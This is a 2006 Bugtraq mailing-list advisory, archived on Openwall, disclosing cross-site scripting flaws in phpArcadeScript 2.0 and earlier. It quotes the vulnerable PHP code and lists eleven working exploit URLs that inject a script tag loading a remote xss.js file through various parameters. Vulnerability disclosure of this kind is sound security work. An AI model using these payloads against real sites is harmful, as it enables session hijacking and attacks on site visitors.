lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060304062359.20834.qmail@securityfocus.com>
Date: 4 Mar 2006 06:23:59 -0000
From: retard@...igs.com
To: bugtraq@...urityfocus.com
Subject: phpArcadeScript XSS Injections


——–summary
	software: phpArcadeScript
	vendors website: http://www.phparcadescript.com/
	versions: <= 2.0
	class: remote
	status: unpatched
	exploit: available
	solution: not available
	discovered by: retard and jim
	risk level: medium

——– description
	due to phpArcadeScript excessive use of global variables attackers
	can very easily inject xss into various portions of the application

	in ./includes/tellafriend.php:

21 	22 if ($about == "game")
23 	{
24 	echo $gamename;
25 	}
26	
27	 else
28	 {
29	 echo $site_title;
30	 }
31	 ?>

	this poor coding is repetative throughought the application, possibly
	having more vulnerabilities present in the coding.

——– exploit(s)

	http://example.com/includes/tellafriend.php?about=game&gamename=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/admin/loginbox.php?loginstatus=1&login_status=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/index.php?action=tradelinks&submissionstatus=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/browse.php?cell_title_background_color=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/browse.php?browse_cat_id=1&browse_cat_name=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/displaygame.php?filetype=2&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/displaygame.php?filetype=3&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/displaygame.php?filetype=4&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/displaygame.php?filetype=5&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	http://example.com/includes/displaygame.php?filetype=6&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
	
——– credit
	author(s): retard and jim
	email: retard@...igs.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ